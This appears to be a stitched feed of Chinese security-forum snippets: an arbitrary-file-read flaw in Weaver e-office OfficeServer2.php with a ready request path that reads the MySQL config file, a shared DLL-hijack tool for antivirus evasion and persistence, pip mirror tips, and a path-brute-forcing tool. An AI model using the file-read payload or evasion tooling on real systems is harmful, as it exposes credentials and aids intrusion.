泛微e-office OfficeServer2.php 存在任意文件读取漏洞隐患,攻击者可通过此漏洞获取敏感信息,为下一步攻击做准备。
iweboffice/officeserver2.php?OPTION=LOADFILE&FILENAME=../../bin/mysql_config.ini
倾璇在这篇文章中提供了非常好的示例,用以讲述这个DLL注入器的一些东西,感觉可以试着自己挖掘一下,说不定会有惊喜!
老哥最终还是选择开源了,其实之前一直在看,但是没有过多的学习,最近因为项目上的原因,准备多搞几套免杀方案/维权方案之类的,所以这些东西通通提上日程! go-dll-hiject.zip
有时候我们国内pip3 install xxx会非常卡,这个时候就可以使用-i参数去指定pip源。这里收集了几个不错的,以后直接来这个帖子里复制粘贴就完事了 1.清华源https://pypi.tuna.tsinghua.edu.cn/simple2.阿里云https://mirrors.aliyun.com/pypi/simple/
不知道是不是0day,反正先发出来吧。工具很好,存在一个目录列表,不停地尝试网站路径
点击下载